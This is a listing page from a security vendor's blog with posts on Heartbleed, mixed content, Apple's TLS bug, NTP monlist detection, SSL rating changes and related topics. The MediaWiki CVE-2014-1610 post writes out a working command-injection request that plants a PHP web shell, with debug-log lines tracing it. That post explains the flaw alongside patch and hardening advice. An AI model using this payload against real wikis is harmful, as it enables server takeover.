Skip navigation
1 2 3 ... 6 Previous Next

Security Labs

84 Posts
17

Heartbleed is a name for a critical vulnerability in OpenSSL, a very widely deployed SSL/TLS stack. A coding error had been made in the OpenSSL 1.0.1 code, which was subsequently released in March 2012. The vulnerability is in the rarely used heartbeat mechanism, specified in RFC 6520. The error allows an attacker to trick the server into disclosing a substantial chunk of memory, repeatedly. As you can imagine, process memory is likely to contain sensitive information, for example server private keys for encryption. If those are compromised, the security of the server goes down the drain, too.

 

Your server is probably vulnerable if it's running any version in the OpenSSL 1.0.1 branch. If you'd like to verify if you're vulnerable, today I released a new version of the SSL Labs Server Test. I went through a lot of effort to implement a test that doesn't attempt exploitation (no server data is retrieved). So it should be safe to use. Despite the availability of the test, if you can identify the library version number, I would urge to assume that you are vulnerable, even if the test is not showing a problem.

 

It's difficult to underestimate the impact of this problem. Although we can't conclusively say what exactly can leak in an attack, it's reasonable to assume that your private keys have been compromised. Addressing this issue requires at least three steps: 1) patch, 2) replace the key and certificate, and 3) revoke the old certificate. After that you will need to consider if any additional data might have been leaked too, and take steps to mitigate the leak.

 

Unless your server used Forward Secrecy (only about 7% do), it is also possible that any past traffic could be compromised, but only if you are faced with a powerful adversary who has means to record and store encrypted traffic. If you did not before Forward Secrecy before, now is a great time to ensure you do support it from now on. If this topic is new for you, you can follow my advice here and here.

 

For more details on the nature of this OpenSSL blog, have a look at this post from Matthew Green.

0

Mixed content issues arise when web sites deliver their pages over HTTPS, but allow some of the resources to be delivered in plaintext. The active network attacker can't do anything about the encrypted traffic, but messing with the plaintext can result with attacks ranging from phishing in the best case to full browser compromise in the worst. A single exposed script is sufficient: the attacker can hijack the connection and inject arbitrary attack payloads into it.

 

We tend to talk a lot about other aspects of SSL/TLS, but mixed content is arguably the easiest way to completely mess up your web site encryption.

 

In the very early days of the Web, all mixed content was allowed; web browsers expected site operators to think through the consequences of mixing content. That, of course, did not result with great security. Site operators did whatever they needed to get their work done and decrease costs. Only in recent years did browser vendors start to pay attention and start to restrict mixed content.

Mixed content in modern browsers

Today, almost all major browsers tend to break mixed content into two categories: passive for images, videos, and sound; and activefor more dangerous resources, such as scripts. They tend to allow passive mixed content by default, but reject active content. This is clearly a compromise between breaking the Web and reasonable security.

 

Internet Explorer has been the leader in secure mixed content handling. As early as Internet Explorer 5 (according to this post), they had detection and prevention of insecure content by default. Chrome started blocking by default in 2011, and Firefox in 2013. The default Android browser and Safari, however, still allow all mixed content without any restrictions (and with almost non-existent warnings).

 

Here are the results of my recent testing of what insecure content is allowed by default:

 

BrowserImagesCSSScriptsXHRWebSocketsFrames
Android browser 4.4.xYesYesYesYesYesYes
Chrome 33YesNoNoYesYesNo
Firefox 28YesNoNoNoNoNo
Internet Explorer 11YesNoNoNoNoNo
Safari 7YesYesYesYesYesYes

 

They are mostly as expecting, but there's a surprise with Chrome, which blocks active page content, but still allows plaintext XMLHttpRequest and WebSocket connections.

 

It's worth mentioning that the table does not tell us everything. For example, browsers tend not to control what their plugins do. Further, certain components (e.g., Flash or Java) are full environments in their own right, and there's little browsers can do to enforce security.

Testing for mixed content handling in SSL Labs

To make it easier to evaluate browser handling of this problem, I recently extended the SSL Labs Client Test to probe mixed content handling. When you visit the page, your user browser is tested, and you will get results similar to these:

 

ssl-labs-client-test-mixed-content.png

Mixed content prevalence

Anecdotally, mixed content is very common. At Qualys, we investigated this problem in 2011, along with several other application-level issues that result with full breakage of encryption in web applications. We analysed the homepages of about 250,000 secure web sites from the Alexa  top 1 million list, and determined that 22.41% of them used insecure  content. If images are excluded, the number falls to 18.71%.

 

A more detailed study of 18,526 sites extracted from Alexa top 100,000 took place in 2013: A Dangerous Mix: Large-scale analysis of mixed-content websites (Chen et al.). For each site, up to 200 secure pages were analysed, arriving at a total of 481,656 pages. Their results indicate that up to 43% of web sites have  mixed content issues.

Mitigation

The best defence against mixed content issues is simply not having this type of problem in your code. But that's easily said than done; there are many ways in which mixed content can creep up. When that fails, there are two technologies that can come useful:

 

  • HTTP Strict Transport Security (HSTS) is a mechanism that enforces secure resource retrieval, even in the face of user mistakes (attempting to access your web site on port 80) and implementation errors (your developers place an insecure link into a secure page). HSTS is one of the best thing that happened to TLS recently, but it works only on the hostnames you control.
  • Content Security Policy (CSP) can be used to block insecure resource retrieval from third-party web sites. It also has many other useful features for to address other application security issues, for example XSS.
0

Recently, news about an exploit targeting MediaWiki, the software that powers large-scale websites such as Wikipedia, was made available. What makes it really exciting is the fact that it is only the third remote code execution vulnerability to affect this open-source web platform. Discovered by Check Point vulnerability researchers, this vulnerability, CVE-2014-1610, affects MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11. Because it allows the attacker to compromise the underlying system, it is important to identify and patch affected systems.

 

Conditions Required to Exploit

Exploiting this vulnerability is tricky, as it is exploitable only under the following conditions:

  1. MediaWiki must have uploads enabled. $wgEnableUploads should be set to true.
  2. File types - .PDF & .DjVu must be allowed via $wgFileExtensions and the PdfHandler extension to be enabled.
  3. The user must be in a group with the "upload" rights. By default this is given to all logged-in users.

 

Under default conditions (even on older versions) the first two conditions are untrue! MediaWiki versions 1.1 and later have their uploads disabled. That is, $wgEnableUploads is always set to false and permitted file types are png, gif, jpg and jpeg only. DjVu is natively supported since MediaWiki version 1.8. Though file uploads and PhdHandler extensions can be easily enabled.

 

figure1.png

Figure 1: Configuration page for enabling file uploads

 

The LocalSettings.php file provides local configuration for a MediaWiki installation.

 

figure2.png

Figure 2: Configuration file, showing that uploads are disabled by default

 

How the Exploit Works

The vulnerability exists in the PdfHandler_body.php and DjVu.php source files, which fail to sanitize shell meta-characters. Shell meta-characters are special characters in a command that allow you to communicate with the Unix system using a shell. Some examples of shell meta-characters are the opening square bracket [, backslash \, dollar sign $, pipe symbol |, question mark ? and asterisk or star *.

 

MediaWiki does have a function, wfEscapeShellArg(), to specifically escape such input. But in an apparent programming error, it fails to escape input received via certain parameters such as height and width that are generated while creating a thumbnail of the uploaded file. If file uploads and the PdfHandler extension are enabled, you will be presented with the following screen with an Upload file link in the left column:

 

figure3.png

Figure 3: Example of MediaWiki page with file uploads enabled

 

 

After uploading a .PDF file, the thumb.php source file is used to create a thumbnail and resize images that are used when a web browser requests the file. The PdfHandler is a handler called by thumb.php for viewing PDF files in image mode. You can call it with the width, height, etc. parameters to manipulate the thumbnail directions:

 

figure4.png

Figure 4: An example of a thumbnail created by thumb.php

 

 

Thumb.php actually interfaces extensions to various handlers. This is the key to this vulnerability: simply by passing shell meta-characters to this source file, you can compromise the system.

 

For demonstration purposes, I will be writing a trivial .php shell file, which can execute commands. In Figure 5 below, the highlighted code is where I’m exploiting the width “w” parameter to ‘write’ <?php system(\\$_GET[ cmd]);"> into images/backdoor.php file.

 

figure5.png

Figure 5: Exploit in action

 

 

Choosing a directory with relevant permissions is of importance here. In this case, we have written the shell in the /images folder:

 

figure6.png

Figure 6: Directory with backdoor.php installed by the attacker

 

 

Now you can run a command of your choice:

 

figure7.png

Figure 7: Oh no! The attacker can read the /etc/password file

 

 

What’s going on in the background?

MediaWiki has a very robust debugging environment that helps you debug anything – SQL errors, server errors, extension errors, etc. In this case, to understand what goes on behind the scenes, we simply add the following line to the LocalSettings.php file.

 

$wgDebugLogFile = “/tmp/debug.log”;

 

When you set this directive, you see all that MediaWiki does behind the scenes. This event is of particular importance to us:

 

Start request GET /mediawiki/thumb.php?f=Aisb08.pdf&w=400|%60echo%20%22%3C?php%20system(\\$_GET[cmd]);%22%3Eimages/backdoor.php%60

 

HTTP HEADERS:

 

HOST: localhost

 

.

 

.

 

FileBackendStore::getFileStat: File mwstore://local-backend/local-thumb/4/41/Aisb08.pdf/page1-400|`echo "<?php system(/$_GET[cmd]);">images/backdoor.php`px-Aisb08.pdf.jpg does not exist.

 

IP: 127.0.0.1

 

User: cache miss for user 1

 

User: loading options for user 1 from database.

 

User: logged in from session

 

File::transform: Doing stat for mwstore://local-backend/local-thumb/4/41/Aisb08.pdf/page1-400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php`px-Aisb08.pdf.jpg

 

PdfHandler::doTransform: ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki/images/4/41/Aisb08.pdf' | 'convert' -depth 8 -resize 400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php` - '/tmp/transform_d386f8960888-1.jpg') 2>&1

 

wfShellExec: /bin/bash '/var/www/mediawiki/includes/limit.sh' '('\''gs'\'' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '\''/var/www/mediawiki/images/4/41/Aisb08.pdf'\'' | '\''convert'\'' -depth 8 -resize 400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php` - '\''/tmp/transform_d386f8960888-1.jpg'\'') 2>&1' 'MW_INCLUDE_STDERR=;MW_CPU_LIMIT=180; MW_CGROUP='\'''\''; MW_MEM_LIMIT=307200; MW_FILE_SIZE_LIMIT=102400; MW_WALL_CLOCK_LIMIT=180'

 

Here you see that MediaWiki is trying to see if the thumbnail exists or not. Then the PdfHandler is called in with the “–resize 400” parameter to create an image whose width is 400. Then wfShellExec ends up writing the injected PHP shell in the /var/www/mediawiki/images/ folder.

 

End of story!

 

QualysGuard uses the BlindElephant engine to detect this vulnerability, using a method called static file fingerprinting to detect web application versions. BlindElephant is a fast, accurate, and very generic web application fingerprinter that identifies application and plugin versions via static files. A whitepaper containing more information about this static file fingerprinting technique can throw more light on this concept. However, it should be noted that the BlindElephant engine included in QualysGuard is an advanced version and has a few more features than the one available publicly.

 

How to Protect your MediaWiki Systems

What can you do to protect yourselves from such attacks?

 

The Apache process should be configured only with a 'read only' file access. Ownership and write permissions should be assigned to a separate user. For example, on many systems the Apache process runs as www-data:www-data. This www-data user should be able to read all of the files in your MediaWiki directory either by group permissions or by "other" permissions. It should not have write permissions to the code in your MediaWiki directory. If you use features of MediaWiki which require the "files" directory, then give the www-data user the permission to write files only in that directory.

 

Among other steps, be sure to follow the MediaWiki security recommendations. Additionally, the MediaWiki Security Guide is a more comprehensive guide to set up your own MediaWiki server and write secure PHP and Javascript code that is easy to review and audit.

 

Qualys customers with VULNSIGS-2.2.644-1 and onwards will be alerted of this vulnerability via QID: 12832 - MediaWiki DjVu and PDF File Upload Remote Code Execution Vulnerability. Customers are advised to upgrade to MediaWiki versions 1.22.2, 1.21.5, 1.19.11 or later to remediate this vulnerability.

3

On Friday, Apple released patches for iOS 6.x and 7.x, addressing a mysterious bug that affected TLS authentication. Although no further details were made available, a large-scale bug hunt ensued. This post on Hacker News pointed to the problem, and Adam Langley followed up with a complete analysis.

 

I've just released an update for the SSL Labs Client Test, which enables you to test your user agents for this vulnerability.

 

This bug affects all applications that rely on Apple's SSL/TLS stack, which probably means most of them. Applications that carry with them their own TLS implementations (for example, Chrome and Firefox) are not vulnerable. For iOS, it's not clear when the bug had been introduced exactly. For OS X, it appears that only OS X 10.9 Mavericks is vulnerable.

 

What you should do:

  • iOS 6.x and 7.x: Patches are available, so you should update your devices immediately.
  • OS X 10.9.x: Apple promised a fix would be available soon. Update as soon as it is released. The vulnerability has been fixed in 10.9.2. Update immediately. 
0

The ntpd program is an operating system daemon that sets and maintains the system time in synchronization with Internet standard time servers. As described in CVE-2013-5211, a denial of service condition can be caused by the use of the "monlist" feature, which is enabled by default on most NTP servers. NTP runs over UDP port 123, and since it’s on a UDP port, the source address can be spoofed easily.

 

When the UDP service is queried remotely or the monlist command is run locally (ntpdc-c monlist), the service outputs the list of the last 600 queries that were made from different IP addresses. If the attacker spoofs the source address to be the victim's address, then all the responses are sent back to the victim's address. And because the response data is large, the victim's machine may not be able to handle the response, which can cause a denial of service condition as described in Detect NTP Amplification Flaws.

 

How This Vulnerability Detection Works

Qualys tracks this vulnerability with QID 121695. The scanner first checks if the NTP service is running. After that it sends the MON_GETLIST request to the NTP server as shown in the screen capture below.

 

firstimage.jpg

Fig. 1: MON_GETLIST request

 

 

If the server responds to this request with MON_GETLIST and the size of each data item in the packet is equal to 0x48 (72 in decimal), then that implies that the monlist feature is enabled and the vulnerability is posted. This is shown in the screen capture below.

 

fig-2.png

Fig. 2: MON_GETLIST response with the first 8 bytes underlined in yellow

 

 

NTP Monlist Packet Explanation

In order to understand how the length of the packet is determined, we need to take a look at the monlist packet format. The length is represented in the 7th and 8th bytes.

 

NTP monlist feature works on packet mode 7. A mode 7 packet is used in exchanging data between an NTP server and a client for purposes other than time synchronization, e.g. monitoring, statistics gathering and configuration. Mode 7 packet has the following format:

Screenshot from 2014-01-20 15_40_10.png

Fig. 3: Mode 7 Packet format

 

 

In the example listed in Fig. 2, the response field is: "d7 00 03 2a 00 06 00 48" (underlined in yellow).

 

The first byte 0xd7 is decoded as below:

  1. R (i.e Response Bit): Since this is a response, the bit is set.
  2. M (i.e More Bit): Set for all packets but the last in a response which requires more than one packet. In this example set to 1.
  3. VN (i.e. Version Number): 2 in this example.
  4. Mode: 7, since this is a mode 7 response.

 

The second byte 0x00 is decoded as below:

  1. A (i.e. Authenticated bit): If set, this packet is authenticated. 00 in this example.
  2. Sequence number: For a multipacket response, this contains the sequence number of the existing packet. 0 is first in the sequence, 127 (or less) is the last. 0000000 in this example as it is the first packet.

 

The third byte 0x03 is decoded as below:

Implementation number: An implementation number of zero is used for request codes/data formats which all implementations agree on. Implementation number 255 is reserved (for extensions, in case we runout). In our example it is 0x03 (00000011) which is XNTPD.

 

The fourth byte 0x2a is decoded as below:

Request code: An implementation-specific code which specifies the operation to be (which has been) performed and/or the format and semantics of the data included in the packet. In this example it is 0x2a which is MON_GETLIST_1(42)

 

The fifth and sixth byte 0x00 and 0x06 is decoded as below:

  1. Err (4 bits) : Must be 0 for a request.  For a response, holds an error coderelating to the request.  If nonzero, the operation requested wasn't performed. Error codes are below:  In this response example, it is 0x00 which implies no error.
    • 0- no error
    • 1- incompatable implementation number
    • 2- unimplemented request code
    • 3- format error (wrong data items, data size, packet size etc.)
    • 4- no data available (e.g. request for details on unknown peer)
    • 5-6 - Unknown
    • 7- authentication failure (i.e. permission denied)
  2. Number of data items (12 bits): 0 to 500. In this example 6 data items were returned.

 

The seventh and eighth byte 0x00 and 0x48 is decoded as below:

  1. MBZ: A reserved data field, must be zero in requests and responses.
  2. Size of data item: Size of each data item in packet. 0 to 500. In case of MON_GETLIST_1 it is 0x48 which is also the case in this example.

 

Next is the Data field which is a variable sized area containing request/response data. For requests and responses the size in octets must be greater than or equal to the product of the number of data items and the size of a data item. For requests the data area must be exactly 40 octets in length. For responses the data area may be any length between 0 and 500 octets inclusive.

 

Conclusion

If MON_GETLIST request is sent to the vulnerable NTP server and it responds back with request and the size of data in each packet is 0x48, then we are sure that target is vulnerable to NTP monlist Denial of Service Vulnerability.

 

Recommendation

In order to take immediate action for this vulnerability, users are advised to disable "monlist" functionality by adding the following lines in ntp.conf file:

 

restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery

 

This may restrict the monlist queries on NTP server, and prevent the attack.

 

We recommend our customers to scan their systems for QID 121695 - NTP monlist feature Denial of Service Vulnerability and apply security updates as soon as possible.

9

Today, we're releasing a new version of SSL Rating Guide as well as a new version of SSL Test to go with it. Because the SSL/TLS and PKI ecosystem continues to move at a fast pace, we have to periodically evaluate our rating criteria to keep up.

 

We have made the following changes:

 

  • Support for TLS 1.2 is now required to get an A. If this protocol version is not supported, the grade is capped at B. Given that, according to SSL Pulse, TLS 1.2 is supported by only about 20% servers, we expect this change to affect a large number of assessments.
  • Keys below 2048 bits are now considered weak, with the grade capped at B.
  • Keys below 1024 bits are now considered insecure, and given an F.
  • MD5 certificate signatures are now considered insecure, and given an F.
  • We introduce two new grades, A+ and A-, to allow for finer grading. This change allows us to reduce the grade slightly, when we don't want to reduce it to a B, but we still want to show a difference. More interestingly, we can now reward exceptional configurations.
  • We also introduce a concept of warnings; a server with good configuration, but with one ore more warnings, is given a reduced grade A-.
  • Servers that do not support Forward Secrecy with our reference browsers are given a warning.
  • Servers that do not support secure renegotiation are given a warning.
  • Servers that use RC4 with TLS 1.1 or TLS 1.2 protocols are given a warning. This approach allows those who are still concerned about BEAST to use RC4 with TLS 1.0 and earlier protocols (supported by older clients), but we want them to use better ciphers with protocols that are not vulnerable to BEAST. Almost all modern clients now support TLS 1.2.
  • Servers with good configuration, no warnings, and good support for HTTP Strict Transport Security (long max-age is required), are given an A+.

 

I am very happy that our rating approach now takes into account some very important features, such as TLS 1.2, Forward Secrecy, and HSTS. Frankly, these changes have been overdue. We originally meant to have all of the above in a major update to the rating guide, but we ran out of time, and decided to implement many of the ideas in a patch release.

0

The recent Global OWASP AppSec conference the week of November 18 - 22 at the Marriott Marquis in New York City was a great way to learn more about the latest trends in application security and exchange ideas with other application security professionals.  The conference included updates on many of the OWASP projects as well as some interesting presentations such as:

  • OWASP Zed Attack Proxy – Simon Bennetts
  • Hack.me: a new way to learn web application security – Armando Romeo
  • The Perilous Future of Browser Security – RSnake

 

But the highlight of the show for me was the presentation of the 2nd annual Web Application Security People of the Year (WASPY) Awards. The awards were created in 2012 to honor the top OWASP contributors in a number of different categories. Nominations for the different categories started in May of 2013 and then voted on during the OWASP annual elections in September. So the WASPY award winners represent the best of OWASP as voted on by the OWASP membership.

 

AllWASPYWinners.jpg

From right to left: Helen Gao (2012 winner), Representative for Abbas Naderi, Martin Knobloch, Fabio Cerullo, Simon Bennetts, Richard Greenberg, Tin Zaw, Edward Bonver

 

 

OWASP decided to update the format this year to include a number of different categories including:

  • Best Chapter Leader
  • Best Project Leader
  • Best Community Supporter
  • Best Mission Outreach
  • Best Innovator

 

The WASPY Awards ceremony was held on the evening of first day of the full conference. Dan Cornell, a principal at The Denim Group, did a fantastic job hosting the ceremony, with Kelly Santalucia and Kate Hartman from OWASP providing support.  Helen Gao, the 2012 winner of the WASPY award, was present and gave an inspirational introduction prior to the awards. Each of the awards included a plaque along with a gift certificate for $1000!

 

2013 WASPY Award Winners

Congratulations to the 2013 WASPY Award winners:

 

Best Chapter Leader

Tin Zaw, Richard Greenberg, Kelly Fitzgerald, Stuart Schwarz & Edward Bonver (LA Chapter Leaders)

 

Best Project Leader

Simon Bennetts

 

Best Community Supporter

Fabio Cerullo

 

Best Mission Outreach

Martin Knobloch

 

Best Innovator

Abbas Naderi

 

It was a great few days learning about the latest and greatest in web application security in a great location on Times Square, topped off by honoring the best that OWASP has to offer!

0

An interview with Judie Ayoola, security architect at the Kantar Group, one of the world’s largest market research and consultancy firms and Qualys customer. Paul Fisher went to meet her.

 

Paul Fisher: How and why did you get into information security as a career?


Judie Ayoola: I accidentally fell into security. I originally trained to be a librarian and, while I loved the job, I found myself increasingly reading the computer books while I was classifying them.  I was intrigued about the workings of computers and while I was pursuing my degree in librarianship, one of the modules I did was on the digital storage of information and digital asset management, which I enjoyed. However this was nothing compared to my awakened interest in computer networking and I thought: ‘Wow this is more interesting than what I was doing’, and toyed with the idea of pursuing a Masters in IT.

 

Thanks to the Sybex series on computing, I started dabbling with Windows NT, built my own home lab and started experimenting - in a way I became a librarian techy!  Thus it became a natural progression to start looking for IT support roles after successfully passing a number of MCP exams and this landed me a support position at the University of Westminster. 

 

Throughout my professional life, I’ve tended to grab any opportunity that came my way and whilst working in the support role, a position came up for the role of the IT Security Officer which I applied for. It was a steep learning curve but what kept me going was my passion and the new learning opportunities that came with it. And it has been the same since; in order to protect your data and systems, it is imperative that you keep up to date with the types of attack threat vectors and controls to keep out attackers.

 

Paul: All of which has led to your current position at the Kantar Group, where you say you take a risk-based approach to the security of the business. What do you mean by that?

 

Judie: I start from the premise that it is impossible to protect all the data on the network so using a risk-based approach is the best way to protect your assets with the most cost effective measures. The risk-based approach is predicated on an understanding of your business, its processes and the type of data the organization handles and compliance obligations; in a nutshell it is establishing what is really important to the organisation and the information it needs to survive.

 

At the University for example, student records were central to the business of the university. These were our crown jewels and it was paramount that they were protected with different layers of controls be they procedural, technical or through user awareness. It is also important to know the value of different types of data to the business - is it worth $10,000 or $1m? The value also changes depending on circumstance or even the time of year. For example, in September student enrolment payments and systems would assume higher importance - later in the year, the intranet or CMS would be more important. Therefore it is important to engage with the business in order to identify any changes in process that would affect your ability to support their security requirements - without this approach there will be a disconnect between the implemented controls and their effectiveness.  Finally you have to map threat scenarios or use threat modelling to determine what kind of attacks are you most likely to suffer, the vulnerabilities in your systems or processes and the consequences of a data breach. The most important thing to remember is that your risk assessments must always be based on what the business feels is important, not what IT thinks is important.

 

Paul: Sounds a very sensible and forward thinking approach, but do you think that sometimes the threats get over hyped by vendors?

 

Judie: Yes and no. Vendors need to provide a compelling reason to sell their products but we do need to be realistic; so called APT attacks happen because our carefully implemented security controls failed.  It’s certainly true that the attacks are sophisticated and the motives for these attacks have also changed.  However, how often do we measure the effectiveness of the controls against these new attacks? Are we still concentrating on securing the perimeter without addressing web borne threats or application layer attack?  What about phishing attacks? How do we dissuade users from falling prey to phishing attacks such as spear phishing?  We do need to maintain a sense of perspective. We need to identify the vulnerabilities in our systems, understand how they could be exploited and implement controls to minimise the exposure to these vulnerabilities. Security professionals need to keep up to date with the threats against their businesses or other businesses in the same verticals and use reports of data breaches in the media to assess the effectiveness of their controls to prevent such said breaches on their own network. I would also advocate dovetailing on such stories to sell the security message to business.  Rather than purchase every new solution that addresses the latest types of attack, we need to assess what threat the solution will be addressing and how it would integrate into your existing security strategy otherwise we risk implementing silo systems which invariably introduce complexities and over engineering of the network. If I take the attack against Lockheed Martin in 2011 for example, it appears the attackers used valid credentials of one of their business partners including their RSA token to gain unauthorised access to their network, but this was detected by their monitoring system which was monitoring all user activity including 3rd parties. Would an APT system have prevented an attacker from using a trusted path to attack the network? I would say that a combination of access controls, auditing, monitoring and effective incident response program prevented the attackers from gaining access to their data. What is certain is that the attacker’s modus operandi keeps evolving and we need to monitor and measure our network’s effectiveness to withstand such attacks.

 

Paul: Today everyone is talking about the cloud, how is this changing business security?

 

Judie: Cloud enables the loose coupling of business technology. Cloud computing can benefit companies in a number of ways such as easier maintenance and upgrades, greater flexibility and mobility and continuity of business; however I believe that the only difference between the Cloud and the local data centre is just the physical location.  In terms of the security responsibilities, this does not change. The reluctance of a number of companies to move to the cloud is because of the security challenges but security professionals have to engage with the business and rather than focus on the risks from the cloud, we need to keep the business informed about how these risks can be mitigated to support the secure transaction of business. 

 

As a security architect designing your information security systems, you need to flesh the security requirements (how, where, when, what and who will need access to the information) as well the security standards and compliance and implement systems that address these requirements. These responsibilities should not be transferred to the cloud provider even if they have multiple security certifications such as ISO 27001, SSAE 16, PCI DSS etc. Therefore in terms of business security, we need to implement the same preventative, detective, deterrent, corrective and recovery controls in the cloud. I am aware that this will depend on the type of cloud delivery model implemented, be it SaaS, Paas or IaaS and businesses have more control in the case of an IaaS model; but irrespective of the cloud delivery model, the Security and Compliance teams have to ensure that the cloud provider has systems and controls to protect their data and ask the cloud service provider for their third party audit reports and certifications. 

 

Paul: So, what is the best part of your job?

 

Judie: It’s the feeling of adding value to the business and that there hasn’t been a financial impact due to inadequate security measures. It is important that the systems that are implemented are appropriate and cost effective and meet the needs of the business. It’s about keeping up to date with the ever evolving threat landscape, monitoring the environment, checking on the systems and ensuring that you are providing metrics valid metrics that provide evidence that security implementation positively impacts the organization’s mission success.

 

When I was at the University of Westminster, the security team pressed home the message that security was everyone’s responsibility and could measure the effectiveness of our user awareness campaigns based on the number of emails or tickets that were raised with reports of phishing emails even though we had filters to detect and block phishing emails, as it showed that the users were being vigilant.

 

Paul: That’s a good point. How do you educate people on security awareness?

 

Judie: I am of the opinion that people change their behaviour if what you are trying to change resonates with them. I had an old Director who put it rather succinctly: ‘What’s in it for me?’ And that is now how I try to sell the message of security. An example is rather than tell users not to click on links in emails or malicious websites, you need to tell them why and the impact of doing that and if possible provide examples of reports of phishing victims.  Thankfully the Internet is awash with such security information and we should use such security incidents in the media to drive home the message of security.  We also have to provide the information in bite size and in a medium that meets the different users, such as podcast, videos, flyers or the intranet.

 

Paul: So what about the qualities of people working in information security, what do they need?

 

Judie: We need people who are not simply technical but also those who can sell information security. We need people who can go to the business and speak to them in a language they can understand irrespective of their position within the organisation and ensure that the information is relevant to the user. That is the probably the most important quality. An example is that when discussing security with the CEO, you have to focus on the financial value of preventing viruses rather than the number of viruses that were stopped by the AV software.  In a nutshell, in addition to technical skills, we also need people with communication and marketing skills and the ability to apply social and behavioural science to dealing with the human factors of security defence.

 

Paul: So if you invent one piece of security hardware or software, what would it be? 

 

Judie: I would want one piece of hardware that tells me what my vulnerabilities are, has the intelligence to classify data dynamically, identifies and prevents attacks targeting the network; but in the event that an incident does occur, the system should also prevent the attack from accessing any critical data and limit their activities on the network. My ideal system would also use big data analytics to boost security. Not much really....everything in one!

 

Paul: Thank you, Judie

2

Last week, on October 22, Apple released OS X 10.9 Mavericks, the latest version of their desktop operating system. This was a very important update, given that Safari now, in version 7, supports TLS 1.2. We are slowly moving toward a world in which TLS 1.2 is widely supported. Still, I wanted more. I was hoping that this OS X release was also going to have BEAST mitigations enabled by default. After all, the code was already a part of the previous OS X release (Mountain Lion) and the compatibility risks are minimal given that all other major browser vendors enabled the 1/n-1 split in early 2012.

 

Going through the security release notes, I was excited to see the BEAST attack (CVE-2011-3389) mentioned, but the explanation of the fix was disappointing. It said:

This issue was addressed by enabling TLS 1.2.

The BEAST attack affects only TLS 1.0 and earlier protocols, but client-side support for TLS 1.2 is currently not sufficient as defence because (1) only about 20% of servers support this protocol version and (2) all major browsers are susceptible to protocol downgrade attacks, which can be carried out by active MITM attackers.

 

There was still hope that the release notes were incomplete and I didn't want to give up just yet. Given that Apple releases parts of their operating system as open source and that the code for 10.9 was already available, I thought that reading the source code would be a good starting point. And I knew where I should look, because I had previously examined the SSL stack of Mountain Lion.

 

Today, I was delighted to see that the code had been changed, and that the default setting had been changed from disabled to enabled, meaning that the SSL stack that ships with OS X 10.9 uses BEAST mitigations by default. To see for yourself, look for the first mention of defaultSplitDefaultValue in the source code. It's near the top of the file.

 

Just to be completely sure, I subsequently observed the 1/n-1 split in action using Safari 7 and Wireshark, against a server running TLS 1.0 with only a single CBC suite configured.

Enabling mitigations on Mountain Lion

If you're still running the previous OS X version and do not wish to upgrade at this time, you can manually enable the BEAST mitigations by executing the following command:

 

$ sudo defaults write /Library/Preferences/com.apple.security SSLWriteSplit -integer 2

 

At the very least, you will need to restart Safari; it's probably best to restart the computer. (Disclaimer: I don't have a Mountain Lion installation and have not tried this procedure for myself.)

BEAST has finally been mitigated client-side

With this, we can finally conclude that BEAST has been sufficiently mitigated client-side, and move on.


Update (11 Nov 2013): Even though the source code indicates that the migitation can be controlled, in practice that does not seem to be the case. It is possible that there is a bug in the CoreFoundation framework that prevents the code from reading the settings correctly. Replacing kCFPreferencesAnyHost with kCFPreferencesCurrentHost in the CFPreferencesCopyValue() invocation makes it work, but requires a one-byte patch to the relevant system library. This investigation is the work of Stefan Becker, who also reported the problem to Apple.

0

Continuous Monitoring has become an overused and overhyped term in security circles, driven by US Government mandate (now called Continuous Diagnostics and Mitigation). But that doesn’t change the fact that monitoring needs to be a cornerstone of your security program, within the context of a risk-based paradigm. So your pals at Securosis did their best to document how you should think about Continuous Security Monitoring and how to get there.

 

Given that you can’t prevent all attacks, you need to ensure you detect attacks as quickly as possible. The concept of continuous monitoring has been gaining momentum, driven by both compliance mandates (notably PCI-DSS) and the US Federal Government’s guidance on Continuous Diagnostics and Mitigation, as a means to move beyond periodic assessment. This makes sense given the speed that attacks can proliferate within your environment. In this paper, Securosis will help you assemble a toolkit (including both technology and process) to implement our definition of Continuous Security Monitoring (CSM) to monitor your information assets to meet a variety of needs in your organization.

 

csm-700.jpgWe discuss what CSM is, how to do it, and the most applicable use cases we have seen in the real world. We end with a step-by-step list of things to do for each use case to make sure your heads don’t explode trying to move forward with a monitoring initiative.

 

We don’t expect you to rebalance security spending between protection and detection overnight, but by systematically moving forward with security monitoring and implementing additional use cases over time, you can balance the scales and give yourself a fighting chance to figure out you have been owned – before it’s too late.

 

Download the paper and join us for a live webcast on November 12 at 10am PT. Bring your questions, as we'll be taking Q&A.

 

Originally posted on the Securosis site.

0

In October we made several changes to how we produce our monthly SSL Pulse reports. They include starting tracking Forward Secrecy and RC4, and removing the requirement to mitigate BEAST server side.

Forward Secrecy

Given the increased importance of Forward Secrecy (FS) in SSL/TLS server configuration, SSL Pulse now tracks support for it among the servers in our data sample.

 

 

Just before the October SSL Pulse scan began, we made some tweaks to the way we test, moving away from a simple binary test (Yes or No for Forward Secrecy support) to something more granular and more useful. Now, there are several possible outcomes:

 

  • Not supported - there are no FS suites in the server configuration.
  • Some FS Suites enabled - the server negotiates FS with some browsers.
  • Used with modern browsers - all modern browsers negotiate a FS suite. This will typically happen with a server that has support for ECDHE suites.
  • Used with most browsers - most browsers negotiate a FS suite. This will typically happen with a server that supports ECDHE suites, but falls back to DHE for clients that do not support Elliptic Curve cryptography.

 

You can see the October results in the following screen capture:

 

ssl-pulse-fs-oct2013.png


The results show that a large chunk of the servers (54%) does not use Forward Secrecy with any of the desktop browsers. However, a pretty large chunk (41.8%) does use it with some of the browsers. Only a small number support Forward Secrecy with modern browsers (3.6%), and an even smaller number (0.6%) support robust Forward Secrecy across most browsers.

RC4

We took this opportunity to also start tracking support for RC4 suites. As you may remember, earlier this year we learned that RC4 is much weaker than previously thought. In SSL Labs we now categorise RC4 support as follows:

 

  • Not supported - no RC4 suites supported.
  • Some RC4 suites enabled - server configuration contains RC4 suites, but they might not be actually used. For example, some servers will keep them around to use as a last resort.
  • Used with modern browsers - RC4 is used with at least one modern browser. This shows the servers where RC4 is not used as backup.

 

And the results are as follows:

